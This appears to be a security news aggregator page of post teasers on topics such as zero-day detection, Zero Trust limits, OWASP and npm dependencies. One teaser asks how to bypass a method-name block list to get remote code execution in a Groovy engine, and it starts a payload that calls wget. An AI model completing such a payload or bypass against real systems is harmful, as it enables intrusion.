Collaborate Disseminate
Group 1 creates sensitive data internally and wants to share it securely with an independent Group 2 which uses phones to access the data in the field.
New independent groups other than Group 2 will also appear in the future, and they will… Continue reading Communicating sensitive data between groups
A new study by Debate Security finds that the efficacy problems in cyber security are more related to economic issues rather than technology issues. It found that companies when evaluating which cyber security software to purchase, didn’t include eval… Continue reading New Study Says Cyber Security Technology Isn’t as Effective As It Should Be
Today’s security technologies fail to detect true zero day attacks, K2 has a video that explains why these security technologies fail to protect against zero day attacks and the need for deterministic security.
The post Why Do Zero Day Security Techno… Continue reading Why Do Zero Day Security Technologies Fail to Protect Against Zero Day Attacks?
A recent study by CrowdStrike showed more cyberattacks in the first six months of this year than in all of 2019 in the network activity of Crowdstrike customers. It’s a trend that’s been confirmed by other recent studies done this year.
The post More … Continue reading More Cyberattacks in the First Half of 2020 Than in All of 2019
I maintain an operating system that can be deployed to embedded devices with highly diverse capabilities. One of the aspects of porting the OS to a device is declaring the available entropy sources (including, but not limited to, dedicated… Continue reading Are weak entropy sources worth it?
Earlier this year, in March of 2020, CSO Online published an article on the key facts and figures around cyber security for 2020, including the astonishing fact that 60% of attacks were on vulnerabilities that had patches available.
The post One Key Cy… Continue reading One Key Cyber Security Fact
While SASE and Zero Trust work well for applications where it’s easy to identify valid users, these frameworks fail to address two specific areas of concern.
The post The Limitations of SASE and Zero Trust appeared first on K2io.
The post The Limitatio… Continue reading The Limitations of SASE and Zero Trust
I’m trying to exploit groovy engine for RCE. However, the developer fixed by restricting the method calls with name ‘exec’, ‘execute’, ‘run’, ‘start’. Is there any bypass or alternative to these methods?
Initial Payload
def a= ‘wget https:… Continue reading Exploiting Groovy RCE
The OWASP Top 10 Web Application Security Risks has become synonymous with web application security. Learn who OWASP is and where the top 10 list began and the other resources OWASP has to offer.
The post Understanding the OWASP Top 10 Web Application… Continue reading Understanding the OWASP Top 10 Web Application Risks
Part of the reason why Node.js is so appealing is that it allows for easy application extensibility; you focus on your core competencies, and if you need additional features or functionality, you can include them by adding dependencies.
There are mult… Continue reading Tips for Managing npm Dependencies